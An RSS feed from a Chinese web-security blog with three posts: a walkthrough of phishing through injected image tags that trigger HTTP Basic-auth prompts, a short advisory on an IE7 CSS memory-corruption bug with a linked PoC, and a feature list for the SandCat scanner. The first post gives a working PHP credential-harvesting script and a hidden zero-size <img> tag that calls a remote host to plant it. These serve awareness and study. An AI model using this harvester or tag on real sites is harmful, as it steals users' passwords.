<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>暖月 &#187; 安全审计</title>
	<atom:link href="http://www.nuanyue.com/tag/%e5%ae%89%e5%85%a8%e5%ae%a1%e8%ae%a1/feed" rel="self" type="application/rss+xml" />
	<link>http://www.nuanyue.com</link>
	<description>专注WEB、Linux及数据库应用安全</description>
	<lastBuildDate>Sun, 01 Aug 2010 01:52:44 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>图片引发验证的社工利用</title>
		<link>http://www.nuanyue.com/%e5%9b%be%e7%89%87%e5%bc%95%e5%8f%91%e9%aa%8c%e8%af%81%e7%9a%84%e7%a4%be%e5%b7%a5%e5%88%a9%e7%94%a8.html</link>
		<comments>http://www.nuanyue.com/%e5%9b%be%e7%89%87%e5%bc%95%e5%8f%91%e9%aa%8c%e8%af%81%e7%9a%84%e7%a4%be%e5%b7%a5%e5%88%a9%e7%94%a8.html#comments</comments>
		<pubDate>Sun, 29 Nov 2009 06:52:53 +0000</pubDate>
		<dc:creator></dc:creator>
				<category><![CDATA[Original article | 原创文章]]></category>
		<category><![CDATA[csrf漏洞]]></category>
		<category><![CDATA[安全审计]]></category>
		<category><![CDATA[跨站漏洞]]></category>

		<guid isPermaLink="false">http://www.nuanyue.com/?p=1029</guid>
		<description><![CDATA[<span style="color: #ff0000;">文/<a href="http://www.nuanyue.com/浅谈图片引发验证的社工利用.html">饭</a></span>

在这充满诱惑的网络，恶意攻击者的攻击手法层出不穷。而其中颇具难度的社会工程攻击在取得用户的信任的手段方面，往往更倾向于伪装用户服务提供商，或者是在用户交互时，直接进行欺骗。比较典型的网络钓鱼攻击是将用户引诱到一个通过精心设计与用户信任非常相似的钓鱼网站，让用户在不易察觉的情况下提供用户的个人敏感信息。在2004年，国内也曾出现过假冒银行的网站，比如假冒中国工商银行的网站。而这一篇文章，将主要介绍HTML语言里的图片标签引用而诱引的验证漏洞和其伪装的过程。
在milw0rm.com网站，petros发布一篇题为《Image Authentication Injection Paper + PoC》的文章，里头提到通过创建一个php文件向客户端的浏览器发送401未经授权的状态而导致浏览器显示一个登录对话框（显示给用户好像是从目标网站）发起的一个授权认证对话框，而恶意攻击者会诱使用户输入帐户或者密码之类的敏感信息从而导致钓鱼式的攻击。其流程如下：
<p style="text-align: center;"><a rel="lightbox" href="http://www.nuanyue.com/wp-content/uploads/2009/11/41.jpg" target="_blank"><img class="size-full wp-image-953 aligncenter" style="margin: 0px auto 10px; text-align: center; display: block;" title="图片引发验证的社工利用" src="http://www.nuanyue.com/wp-content/uploads/2009/11/41.jpg" alt="图片引发验证的社工利用" width="470" height="385" /></a></p>

HTTP是一种基于请求与响应模式的、无状态的、应用层的协议，客户端向服务器发送一个请求，请求头包含请求的方法、URL、协议版本、以及包含请求修饰符、客户 信息和内容的类似于MIME的消息结构。服务器以一个状态行作为响应，相应的内容包括消息协议的版本，成功或者错误编码加上包含服务器信息、实体元信息以及可能实体内容。对整个过程进行抓包:[......]<p class='read-more'><a href='http://www.nuanyue.com/%e5%9b%be%e7%89%87%e5%bc%95%e5%8f%91%e9%aa%8c%e8%af%81%e7%9a%84%e7%a4%be%e5%b7%a5%e5%88%a9%e7%94%a8.html' target='_blank'>全文阅读</a></p>]]></description>
			<content:encoded><![CDATA[<p><span style="color: #ff0000;">文/<a href="http://www.nuanyue.com/浅谈图片引发验证的社工利用.html">饭</a></span></p>
<p>在这充满诱惑的网络，恶意攻击者的攻击手法层出不穷。而其中颇具难度的社会工程攻击在取得用户的信任的手段方面，往往更倾向于伪装用户服务提供商，或者是在用户交互时，直接进行欺骗。比较典型的网络钓鱼攻击是将用户引诱到一个通过精心设计与用户信任非常相似的钓鱼网站，让用户在不易察觉的情况下提供用户的个人敏感信息。在2004年，国内也曾出现过假冒银行的网站，比如假冒中国工商银行的网站。而这一篇文章，将主要介绍HTML语言里的图片标签引用而诱引的验证漏洞和其伪装的过程。<br />
在milw0rm.com网站，petros发布一篇题为《Image Authentication Injection Paper + PoC》的文章，里头提到通过创建一个php文件向客户端的浏览器发送401未经授权的状态而导致浏览器显示一个登录对话框（显示给用户好像是从目标网站）发起的一个授权认证对话框，而恶意攻击者会诱使用户输入帐户或者密码之类的敏感信息从而导致钓鱼式的攻击。其流程如下：</p>
<p style="text-align: center;"><a rel="lightbox" href="http://www.nuanyue.com/wp-content/uploads/2009/11/41.jpg" target="_blank"><img class="size-full wp-image-953 aligncenter" style="margin: 0px auto 10px; text-align: center; display: block;" title="图片引发验证的社工利用" src="http://www.nuanyue.com/wp-content/uploads/2009/11/41.jpg" alt="图片引发验证的社工利用" width="470" height="385" /></a></p>
<p>HTTP是一种基于请求与响应模式的、无状态的、应用层的协议，客户端向服务器发送一个请求，请求头包含请求的方法、URL、协议版本、以及包含请求修饰符、客户 信息和内容的类似于MIME的消息结构。服务器以一个状态行作为响应，相应的内容包括消息协议的版本，成功或者错误编码加上包含服务器信息、实体元信息以及可能实体内容。对整个过程进行抓包:<br />
HTTP请求：</p>

<div class="wp_codebox"><table><tr id="p10291"><td class="code" id="p1029code1"><pre class="html" style="font-family:monospace;">GET /iai.php HTTP/1.1 表示请求方法GET，请求的地址，和HTTP协议版本
Accept: */*           表示客户端可识别的内容类型列表，*/*表示所有类型
Accept-Language: zh-cn 表示客户端所能解盘的语言：简体中文
Accept-Encoding: gzip, deflate 表示客户端可以解盘的类型
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)              表示客户端浏览器型号
Host: www.test.cn 表示提交请求的页面
Connection: Keep-Alive      表示TCP连接保持打开</pre></td></tr></table></div>

<p>HTTP响应：</p>

<div class="wp_codebox"><table><tr id="p10292"><td class="code" id="p1029code2"><pre class="html" style="font-family:monospace;">HTTP/1.1 401 Unauthorized  表示HTTP协议版本，应答码是401 即未经授权访问
Date: Sat, 25 Jul 2009 11:42:27 GMT  表示当前的GMT时间
Server: Apache/2.2.3 (CentOS)  表示服务器的操作类型
X-Powered-By: PHP/5.1.6        表示服务器的脚本版本
WWW-Authenticate: Basic realm=&quot;Text&quot; 表示客户端在Authenticate头中提供的授权信息
Content-Length: 3  表示连接内容长度
Connection: close  表示TCP连接关闭
Content-Type: text/html 表示文档类型
负责响应的iai.php文件内容：
  header('WWW-Authenticate: Basic realm=&quot;Text&quot;');
  header('HTTP/1.0 401 Unauthorized');
使用了PHP中的Header()函数，发送一个原始HTTP标头[Http Header]到客户端。</pre></td></tr></table></div>

<p>钓鱼式攻击的利用，从上面流程图里，可以知道大致步骤如下：<br />
在网页里插入恶意代码<br />
插入调用远程图片的代码，形如：</p>

<div class="wp_codebox"><table><tr id="p10293"><td class="code" id="p1029code3"><pre class="html" style="font-family:monospace;">[img]http://B.com/iai.php[/img]
&lt;img src=&quot;http://B.com/iai.php&quot; alt=&quot;&quot; width=&quot;0&quot; height=&quot;0&quot; /&gt;</pre></td></tr></table></div>

<p>最好是高度宽度都为0，免得在网页里显示空白,代码如下：</p>

<div class="wp_codebox"><table><tr id="p10294"><td class="code" id="p1029code4"><pre class="html" style="font-family:monospace;">&amp;lt; !DOCTYPE html PUBLIC &quot;-//W3C//DTD XHTML 1.0 Transitional//EN&quot; &quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd&quot;&amp;gt;
&nbsp;
&lt;img src=&quot;http://www.B.com/iai.php&quot; alt=&quot;&quot; /&gt;
&nbsp;
&lt;img src=&quot;http://www.B.com/iai.php&quot; alt=&quot;&quot; /&gt;</pre></td></tr></table></div>

<p>编写iai.php脚本这个脚本的主要功能包括返回401应答和获取提交的敏感信息，并保存。代码如下：</p>

<div class="wp_codebox"><table><tr id="p10295"><td class="code" id="p1029code5"><pre class="php" style="font-family:monospace;"><span style="color: #339933;">&amp;</span>lt<span style="color: #339933;">;</span> ?php
    <span style="color: #000000; font-weight: bold;">global</span>  <span style="color: #000088;">$username</span><span style="color: #339933;">,</span><span style="color: #000088;">$passwd</span><span style="color: #339933;">,</span><span style="color: #000088;">$host</span><span style="color: #339933;">;</span>
      <span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span><span style="color: #339933;">!</span><span style="color: #990000;">isset</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_SERVER</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'PHP_AUTH_USER'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span>
    <span style="color: #009900;">&#123;</span>
     <span style="color: #990000;">header</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">'WWW-Authenticate: Basic realm=&quot;test&quot;'</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
     <span style="color: #990000;">header</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">'HTTP/1.0 401 Unauthorized'</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
     <span style="color: #990000;">exit</span><span style="color: #339933;">;</span>
     <span style="color: #009900;">&#125;</span>
       <span style="color: #000088;">$username</span><span style="color: #339933;">=</span><span style="color: #000088;">$_SERVER</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'PHP_AUTH_USER'</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span>
       <span style="color: #000088;">$passwd</span><span style="color: #339933;">=</span><span style="color: #000088;">$_SERVER</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'PHP_AUTH_PW'</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span>
       <span style="color: #000088;">$host</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$_SERVER</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'HTTP_HOST'</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span>
       <span style="color: #000088;">$myFile</span> <span style="color: #339933;">=</span> <span style="color: #0000ff;">&quot;log.txt&quot;</span><span style="color: #339933;">;</span>
       <span style="color: #000088;">$fh</span> <span style="color: #339933;">=</span> <span style="color: #990000;">fopen</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$myFile</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">'a'</span><span style="color: #009900;">&#41;</span> or <span style="color: #990000;">die</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;can't open file&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
       <span style="color: #990000;">fwrite</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$fh</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">&quot;网址:<span style="color: #000099; font-weight: bold;">\t</span><span style="color: #006699; font-weight: bold;">$host</span><span style="color: #000099; font-weight: bold;">\t</span><span style="color: #000099; font-weight: bold;">\t</span>&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
       <span style="color: #990000;">fwrite</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$fh</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">&quot;usname:<span style="color: #000099; font-weight: bold;">\t</span><span style="color: #006699; font-weight: bold;">$username</span><span style="color: #000099; font-weight: bold;">\t</span>&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
       <span style="color: #990000;">fwrite</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$fh</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">&quot;passwd:<span style="color: #000099; font-weight: bold;">\t</span><span style="color: #006699; font-weight: bold;">$passwd</span><span style="color: #000099; font-weight: bold;">\r</span><span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
       <span style="color: #990000;">fclose</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$fh</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
?<span style="color: #339933;">&amp;</span>gt<span style="color: #339933;">;</span></pre></td></tr></table></div>

<p>当正常用户访问网站时，插在网页里的iai.php文件，即会强制弹出验证框，如图：</p>
<p style="text-align: center;"><a rel="lightbox" href="http://www.nuanyue.com/wp-content/uploads/2009/11/21.jpg" target="_blank"><img class="size-full wp-image-953 aligncenter" style="margin: 0px auto 10px; text-align: center; display: block;" title="图片引发验证的社工利用" src="http://www.nuanyue.com/wp-content/uploads/2009/11/21.jpg" alt="图片引发验证的社工利用" width="540" height="485" /></a></p>
<p>如果用户提交了帐户或者密码后，iai.php会在后台自动提交给远程的log.txt文件，产生内容如下：</p>
<p style="text-align: center;"><a rel="lightbox" href="http://www.nuanyue.com/wp-content/uploads/2009/11/31.jpg" target="_blank"><img class="size-full wp-image-953 aligncenter" style="margin: 0px auto 10px; text-align: center; display: block;" title="图片引发验证的社工利用" src="http://www.nuanyue.com/wp-content/uploads/2009/11/31.jpg" alt="图片引发验证的社工利用" width="540" height="199" /></a></p>
<p>通过加载脚本强制验证窗体的弹出，此社工在利用时，还是具有一定的局限性。在隐藏攻击意图时，有些不足，弹出的框，比较生硬，也可以语言措辞下进行修改，但是对一些安全意识缺失的网民来说，还是会有上当的可能。希望大家能当心，不要轻易输入敏感信息。</p>
]]></content:encoded>
			<wfw:commentRss>http://www.nuanyue.com/%e5%9b%be%e7%89%87%e5%bc%95%e5%8f%91%e9%aa%8c%e8%af%81%e7%9a%84%e7%a4%be%e5%b7%a5%e5%88%a9%e7%94%a8.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>IE7.0 异常CSS导致内存破坏漏洞</title>
		<link>http://www.nuanyue.com/ie7-0-%e5%bc%82%e5%b8%b8css%e5%af%bc%e8%87%b4%e5%86%85%e5%ad%98%e7%a0%b4%e5%9d%8f%e6%bc%8f%e6%b4%9e.html</link>
		<comments>http://www.nuanyue.com/ie7-0-%e5%bc%82%e5%b8%b8css%e5%af%bc%e8%87%b4%e5%86%85%e5%ad%98%e7%a0%b4%e5%9d%8f%e6%bc%8f%e6%b4%9e.html#comments</comments>
		<pubDate>Wed, 25 Nov 2009 16:23:22 +0000</pubDate>
		<dc:creator></dc:creator>
				<category><![CDATA[Vulnerability order | 漏洞整理]]></category>
		<category><![CDATA[安全审计]]></category>
		<category><![CDATA[安全设置]]></category>

		<guid isPermaLink="false">http://www.nuanyue.com/?p=1014</guid>
		<description><![CDATA[<p>文/<a href="http://www.yxlink.com" target="_blank">铱迅</a><br />
1．漏洞介绍<br />
在XHTML 1.0标准下，使用特殊构造的CSS样式，在Internet Explorer 7.0 打开特定的网页后，Internet Explorer 7.0将发生内存崩溃，EIP指针将访问0x70613e5b附近的内存区域。如果将0x70613e5b附近覆盖特殊的机器码，[......]</p><p class='read-more'><a href='http://www.nuanyue.com/ie7-0-%e5%bc%82%e5%b8%b8css%e5%af%bc%e8%87%b4%e5%86%85%e5%ad%98%e7%a0%b4%e5%9d%8f%e6%bc%8f%e6%b4%9e.html' target='_blank'>全文阅读</a></p>]]></description>
			<content:encoded><![CDATA[<p>文/<a href="http://www.yxlink.com" target="_blank">铱迅</a><br />
1．漏洞介绍<br />
在XHTML 1.0标准下，使用特殊构造的CSS样式，在Internet Explorer 7.0 打开特定的网页后，Internet Explorer 7.0将发生内存崩溃，EIP指针将访问0x70613e5b附近的内存区域。如果将0x70613e5b附近覆盖特殊的机器码，就可以执行任意命令。<br />
2．漏洞危害(危害等级高)<br />
黑客如果将含有“漏洞利用程序的网页”置于网站上，浏览过含有“漏洞利用程序的网页”的客户端将被运行特洛伊木马。<br />
3．漏洞利用<br />
1. 通过此漏洞执行Windows的calc命令示例（利用成功后将执行计算器程序）<br />
点击查看：<a href="http://www.nuanyue.com/wp-content/uploads/2009/11/poc.txt" target="_blank">IE7.0 异常CSS导致内存破坏漏洞POC</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.nuanyue.com/ie7-0-%e5%bc%82%e5%b8%b8css%e5%af%bc%e8%87%b4%e5%86%85%e5%ad%98%e7%a0%b4%e5%9d%8f%e6%bc%8f%e6%b4%9e.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>SandCat ：高级Web应用程序安全测试工具</title>
		<link>http://www.nuanyue.com/sandcat-%ef%bc%9a%e9%ab%98%e7%ba%a7web%e5%ba%94%e7%94%a8%e7%a8%8b%e5%ba%8f%e5%ae%89%e5%85%a8%e6%b5%8b%e8%af%95%e5%b7%a5%e5%85%b7.html</link>
		<comments>http://www.nuanyue.com/sandcat-%ef%bc%9a%e9%ab%98%e7%ba%a7web%e5%ba%94%e7%94%a8%e7%a8%8b%e5%ba%8f%e5%ae%89%e5%85%a8%e6%b5%8b%e8%af%95%e5%b7%a5%e5%85%b7.html#comments</comments>
		<pubDate>Fri, 05 Jun 2009 16:02:51 +0000</pubDate>
		<dc:creator></dc:creator>
				<category><![CDATA[Tools Collection | 工具收集]]></category>
		<category><![CDATA[安全审计]]></category>
		<category><![CDATA[渗透测试]]></category>

		<guid isPermaLink="false">http://www.nuanyue.com/?p=568</guid>
		<description><![CDATA[<p>SandCat 这是一个了不起的工具来工作。SandCat有两个版本-自由与专业版。SandCat所具有功能：<br />
* 缓冲区溢出<br />
* Cookie Manipulation *Cookie 修改<br />
*命令执行<br />
*  CRLF注入<br />
* Cross Frame Scripting *跨帧脚本<br />
* 跨站点脚本[......]</p><p class='read-more'><a href='http://www.nuanyue.com/sandcat-%ef%bc%9a%e9%ab%98%e7%ba%a7web%e5%ba%94%e7%94%a8%e7%a8%8b%e5%ba%8f%e5%ae%89%e5%85%a8%e6%b5%8b%e8%af%95%e5%b7%a5%e5%85%b7.html' target='_blank'>全文阅读</a></p>]]></description>
			<content:encoded><![CDATA[<p>SandCat 这是一个了不起的工具来工作。SandCat有两个版本-自由与专业版。SandCat所具有功能：<br />
* 缓冲区溢出<br />
* Cookie Manipulation *Cookie 修改<br />
*命令执行<br />
*  CRLF注入<br />
* Cross Frame Scripting *跨帧脚本<br />
* 跨站点脚本（ XSS ）<br />
* Default Account *默认帐户<br />
* 目录列表<br />
* 目录遍历<br />
* 文件包含<br />
* 敏感信息泄露<br />
* LDAP 注入<br />
* MX 注入<br />
* Password Disclosure 密码泄露<br />
* Path Disclosure *路径泄露<br />
* PHP代码注入<br />
* 固有漏洞： IIS中/ iPlanet /其他<br />
* Source Code Disclosure * 源代码公开<br />
* SQL注入<br />
* XPath Injection *XPath注入<br />
* 杂项<br />
它还执行下列应用程序会检查：<br />
* Backup Files *备份文件<br />
* Common Exposures: Dangerous Methods, Default Content, Internal IP Address Disclosure *共同暴露：危险方法，默认内容，内部IP地址信息披露<br />
*常见的文件和文件夹<br />
* Common Vulnerable Scripts: ASP, ASP .Net, PHP, JSP, Perl<br />
* Email Form Hijacking *电子邮件劫持<br />
* Outdated Server Software *过时的服务器软件<br />
* Path Disclosure *路径泄露<br />
* Source Code Disclosure * 源代码公开<br />
* Suspicious HTML Comments *可疑的HTML评论<br />
* Unencrypted Login *未加密的登录<br />
* Web-Based Backdoors *基于Web的后门<br />
* Compliance: OWASP Top 10, PHP Top 5 *遵守： OWASP十大， PHP的最常见的5个<br />
* Fault Injection: Parameter Tampering, Form Field Manipulation *故障注入：参数篡改，表单域操纵</p>
<p>It can also perform these Server Checks:它也可以执行这些Server检查：<br />
* CGI, CGI-Bin &amp; CGI-Local Folders *共同闸道介面， cgi &#8211; bin目录和CGI方式，本地文件夹<br />
* CGI-Sys *的CGI -系统<br />
* Common Files and Folders *常见的文件和文件夹<br />
* Common Server Vulnerabilities: Cisco IOS, ColdFusion, Domino, IIS, NCSA, FrontPage, FrontPage CGI *通用服务器漏洞：思科IOS ， ColdFusion ，多米诺， IIS中，国家能力自评时， FrontPage ， FrontPage中的CGI<br />
* Common Vulnerable Scripts: ASP, ASP .Net, PHP, JSP, Perl *共同弱势脚本： ASP技术， ASP技术。净的， PHP ， JSP的，的Perl<br />
* Compliance: SANS Top Twenty *遵守： SANS的前20<br />
* Database Disclosure * 数据库披露<br />
* Denial-of-Service *拒绝服务<br />
* IDS Testing *入侵检测系统测试<br />
* Old/Backup Files: Common Backup Folders &amp; Files *旧/备份文件：共同的备份文件夹和文件<br />
* Outdated Server Software *过时的服务器软件<br />
* Web-Based Backdoors *基于Web的后门<br />
* WinCGI * WinCGI</p>
<p>下载：<a href="http://www.syhunt.com/downloads/sandcat-3.7.8.exe">sandcat-3.7.8</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.nuanyue.com/sandcat-%ef%bc%9a%e9%ab%98%e7%ba%a7web%e5%ba%94%e7%94%a8%e7%a8%8b%e5%ba%8f%e5%ae%89%e5%85%a8%e6%b5%8b%e8%af%95%e5%b7%a5%e5%85%b7.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
